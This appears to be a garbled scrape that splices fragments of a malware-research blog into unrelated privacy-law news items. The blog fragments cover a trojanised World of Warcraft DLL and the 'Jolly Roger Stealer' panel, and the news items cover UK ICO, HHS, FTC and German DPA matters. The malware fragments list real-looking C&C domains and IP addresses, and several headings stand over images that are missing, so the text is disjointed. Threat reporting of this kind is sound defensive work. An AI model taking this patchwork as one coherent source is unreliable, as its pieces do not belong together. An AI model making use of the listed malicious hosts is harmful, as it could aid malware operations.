• dns: 1 ›› ip: 142.4.105.98 - adress: WWW.CURSE.PW
• dns: 1 ›› ip: 142.4.105.98 - adress: WWW.WOWMATRIX.PW
• dns: 1 ›› ip: 142.4.105.99 - adress: WWW.WOWMATRIX.PW.PW

Blizzard released a statement due to this new threat:

I don't know how the DLL works for the moment (well, at least a bit).
My debugger had some stability issues when handling wow.exe, but I will get back to this; the mechanism seems interesting (and they even use OutputDebugString!).

Network traffic after logging in:

C&C (in Chinese):

Compromised accounts:

That's all for the moment :)

UK ICO to Investigate Only Serious or Repeat Violations

On December 18, 2013, the UK Information Commissioner’s Office (“ICO”) published its proposed strategy for handling complaints, stating that, beginning in April 2014, it will focus its efforts on the investigation of serious and repeat violations of data protection laws. The ICO also intends to publish regular reports highlighting the number of complaints it receives about organizations and enforcement actions it has taken. The ICO is seeking comments on the proposed strategy, which is explained in a public consultation document, before January 31, 2014.

Under the new approach, the ICO would not investigate every complaint it receives, instead taking a more selective approach to investigations and working to resolve disputes between organizations and individuals. The ICO noted that “[t]oo often we are drawn into adjudicating on individual disputes between organisations and their customers or clients, particularly where the legislation we oversee may only be a peripheral part of the matter being disputed. We want to focus on those who get things wrong repeatedly, and take action against those who commit serious contraventions of the legislation.”

The ICO makes clear in the consultation document that it does not intend to adopt a “one size fits all” approach to complaint resolution. The approach it takes in individual cases will depend on whether the ICO is able to “identify an opportunity to improve information rights practice,” which will vary on a case-by-case basis and may involve offering advice to both parties. For example, the ICO may ask the organization to take ownership of its customer’s concern, to improve its practices, or, in the most serious cases, to change its conduct or face an enforcement action. The ICO believes that this approach, coupled with its provision of tools and guidance, will enable individuals to receive a clear and open response to their concerns, encourage compliance, and ensure the ICO’s limited resources are targeted at companies that seriously or repeatedly fail to ensure good data protection.

The ICO has also committed to improving the way it captures and analyzes complaints in an effort to “quickly determine whether the concern is a one-off, or is evidence of a pattern of poor practice.” It also will publish regular reports listing the number of complaints it has received about organizations, the enforcement actions it has taken and noting improvements made to information rights practices in the sectors it regulates.

The ICO intends its new approach to take effect starting April 1, 2014. To submit a response to the consultation, visit the ICO’s consultation webpage and complete the consultation response document. The consultation is open to the public until January 31, 2014.

Privacy and Data Security: The Future of the U.S.-EU Safe Harbor

The EU-U.S. Safe Harbor Framework is an important cross-border data transfer mechanism that enables certified organizations to move personal data from the European Union to the United States in compliance with European data protection laws. Recently, however, the Safe Harbor’s future has been thrown into doubt. In an article published on October 30, 2013 by Practical Law, Lisa J. Sotto, partner and head of the Global Privacy and Cybersecurity practice at Hunton & Williams LLP, partner Bridget Treacy and associate Naomi McBride, examine the Safe Harbor Framework and its future viability in light of criticism from the European Commission and some EU data protection authorities, which intensified in the past year following disclosures regarding the U.S. government’s surveillance programs.

Download a PDF copy of the article.

UK ICO Publishes App Developer Guidance

In December 2013, the UK Information Commissioner’s Office (“ICO”) issued non-binding guidance aimed at app developers (the “Guidance”). The Guidance applies to all types of mobile devices, including smart TVs and video game consoles.

In the Guidance, the ICO emphasizes that the Data Protection Act 1998 (“DPA”) equally applies to mobile apps as it does to more traditional businesses. Further, the mobile environment presents particular privacy concerns due to the fact that:

  • mobile devices are portable and personal, used frequently, and are generally always on;
  • mobile devices typically include multiple data collection sensors (e.g., microphone, camera, GPS receiver); and
  • smaller screens make it more challenging to provide adequate notice to users.

Importance of Privacy by Design

The Guidance encourages app developers to consider privacy issues at the outset of the design phase and adopt a privacy by design approach. This underscores the importance for developers to understand how the personal data collected through the app will be used as well as who the data controller will be throughout the lifecycle of the app. Even where an app developer creates an app on behalf of a client, so that it will not act as the data controller, the Guidance encourages developers to consider privacy and security during the design and development process.

Providing Fair Notice

The Guidance provides practical tips on providing fair notice to users, in particular: (1) the importance of using plain English that is appropriate to the target audience; (2) clearly stating the purposes for which the personal data will be used; (3) providing notice as soon as practicable; and, (4) using layered notices if appropriate. The Guidance highlights the importance of drawing users’ attention to unusual or unexpected uses of their personal data, and recommends using “just-in-time” notices to do so.

Providing Meaningful Choices

The Guidance encourages developers to give users “granular” choices where possible, as opposed to “all or nothing” choices, as well as permitting users to later change their minds.

In addition to better legal compliance, the ICO highlights the potential commercial benefits of better privacy. “Users will have more confidence in apps that clearly respect their privacy. Users may uninstall or remove apps that contain surprises about how their personal data is used.”

HHS Announces Settlement with Dermatology Practice for Potential HIPAA Privacy, Security and Breach Notification Rule Violations

On December 26, 2013, the Department of Health and Human Services (“HHS”) announced a resolution agreement and $150,000 settlement with Adult & Pediatric Dermatology, P.C. (“APDerm”), a private dermatology practice based in Massachusetts, following a security breach that affected approximately 2,200 individuals. In connection with the announcement, the HHS Office for Civil Rights (“OCR”) Director Leon Rodriguez stated that “[c]overed entities of all sizes need to give priority to securing electronic protected health information.”

OCR initiated an investigation of APDerm following a report that an unencrypted flash drive was stolen from a vehicle owned by an APDerm staff member. The flash drive was not recovered and contained the electronic protected health information (“ePHI”) of approximately 2,200 patients of APDerm. After the investigation, OCR alleged that APDerm failed to (1) conduct a timely and thorough analysis of the risks to the confidentiality of its ePHI, (2) fully draft and implement written policies and procedures to train its workforce regarding breach notification requirements, and (3) reasonably safeguard the unencrypted flash drive that was stolen from a vehicle owned by an APDerm staff member.

Pursuant to the resolution agreement, APDerm has agreed to pay a $150,000 settlement to HHS. In addition, the Corrective Action Plan attached to the resolution agreement requires APDerm to:

  • conduct a comprehensive risk analysis of the security risks and vulnerabilities to the company’s ePHI;
  • develop a risk management plan based on the risk analysis, which must be approved by OCR;
  • report instances of noncompliance by its personnel with its privacy, security and breach notification policies and procedures to OCR;
  • submit an implementation report detailing how APDerm will comply with the resolution agreement and the Corrective Action Plan; and
  • retain documents related to compliance with the Corrective Action Plan for three years.

View the resolution agreement.

FTC Reaches Settlement with Accretive Health

On December 31, 2013, the Federal Trade Commission announced that Accretive Health, Inc. (“Accretive”) has agreed to settle charges that the company’s inadequate data security measures unfairly exposed sensitive consumer information to the risk of theft or misuse. Accretive experienced a breach in July 2011 that involved the protected health information of more than 23,000 patients.

The FTC alleged that Accretive failed to (1) provide reasonable and appropriate security measures to protect consumers’ personal information, (2) employ reasonable procedures designed to ensure that employees remove consumers’ personal information that they no longer needed from their computers, and (3) adequately restrict employee access to consumers’ personal information based on an employee’s need for the information. Under the terms of the settlement with the FTC, which will be in force for 20 years, Accretive must establish a comprehensive information security program that will be evaluated both initially and every two years by a certified, independent third party.

On July 31, 2012, Accretive settled a federal lawsuit with the Minnesota Attorney General for $2.5 million for violations of the Health Insurance Portability and Accountability Act of 1996 and various Minnesota debt collection and consumer protection laws relating to the same incident.

The settlement is open for public comment until January 30, 2014.

Update: On February 24, 2014, the FTC approved the final consent order with Accretive.

Jolly Roger Stealer

My friend Kafeine has already done a post on it, although someone recently sent me a URL on my cybercrime tracker.. I give a f%$k
• dns: 1 ›› ip: 178.162.193.24 - adresse: LOADER.ISTMEIN.DE

Bot statistic:
CPU "Arhitecture"

Task:

Search module:

HTTP:

Mail:

Create task:

Task statistic:

I haven't looked at a sample because I don't have one, but it sounds very lame, like Plasma HTTP, which grabs everything without checking whether there is already a duplicate.

German DPAs Publish Further Guidance on the Use of Personal Data for Advertising Purposes

On December 10, 2013, a German data protection working group on advertising and address trading published new guidelines on the collection, processing and use of personal data for advertising purposes (the “Guidelines”). The working group was established by the committee of German data protection authorities (“DPAs”) and is chaired by the Bavarian DPA. The first set of guidelines was published in November 2012.

These new Guidelines cover, among other things, the following:

  • the use of personal data for advertising purposes without the data subject’s consent (so-called “list-privilege”);
  • consent in the context of advertising, including form (written, electronic, double opt-in) and content requirements; and
  • the data subject’s rights with respect to advertising and the timeframes within which data controllers must respond to the exercise of such rights.

Both sets of guidelines represent a significant clarification of the data protection regulations that apply to advertising in Germany. They are relevant to all businesses with German advertising operations, regardless of target audience (business-to-business and business-to-consumer) or advertising channel (email, telephone, mail).